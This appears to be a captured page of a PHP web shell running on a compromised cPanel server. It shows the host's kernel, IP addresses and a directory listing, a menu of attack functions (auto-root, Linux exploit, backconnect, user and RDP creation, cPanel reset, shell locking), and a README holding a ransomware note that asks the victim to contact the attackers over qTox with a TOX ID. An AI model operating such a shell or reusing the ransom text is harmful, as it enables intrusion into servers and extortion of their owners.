Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
cpanel /
[ HOME SHELL ]
Name
Size
Permission
Action
composer
[ DIR ]
drwxr-xr-x
ea-apr16
[ DIR ]
drwxr-xr-x
ea-brotli
[ DIR ]
drwxr-xr-x
ea-libicu
[ DIR ]
drwxr-xr-x
ea-libxml2
[ DIR ]
drwxr-xr-x
ea-libzip
[ DIR ]
drwxr-xr-x
ea-nodejs16
[ DIR ]
drwxr-xr-x
ea-oniguruma
[ DIR ]
drwxr-xr-x
ea-openssl
[ DIR ]
drwxr-xr-x
ea-openssl11
[ DIR ]
drwxr-xr-x
ea-php56
[ DIR ]
dr-xr-xr-x
ea-php70
[ DIR ]
dr-xr-xr-x
ea-php71
[ DIR ]
dr-xr-xr-x
ea-php72
[ DIR ]
dr-xr-xr-x
ea-php73
[ DIR ]
dr-xr-xr-x
ea-php74
[ DIR ]
dr-xr-xr-x
ea-php80
[ DIR ]
dr-xr-xr-x
ea-php81
[ DIR ]
dr-xr-xr-x
ea-ruby24
[ DIR ]
dr-xr-xr-x
libargon2
[ DIR ]
drwxr-xr-x
libcurl
[ DIR ]
drwxr-xr-x
libmcrypt
[ DIR ]
drwxr-xr-x
libmemcached
[ DIR ]
drwxr-xr-x
libtidy
[ DIR ]
drwxr-xr-x
nghttp2
[ DIR ]
drwxr-xr-x
README.md
404
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
Please contact us through the qtox tool Download qtox https://github.com/qTox/qTox/blob/master/README.md#qtox If you can't contact us, please contact some data recovery company(suggest taobao.com), may they can contact to us. Add our TOX ID and send an encrypted file and 'Sorry-ID' for testing decryption. Our TOX ID: 3D7889AEC00F2325E1A3FBC0ACA4E521670497F11E47FDE13EADE8FED3144B5EB56D6B198724
Close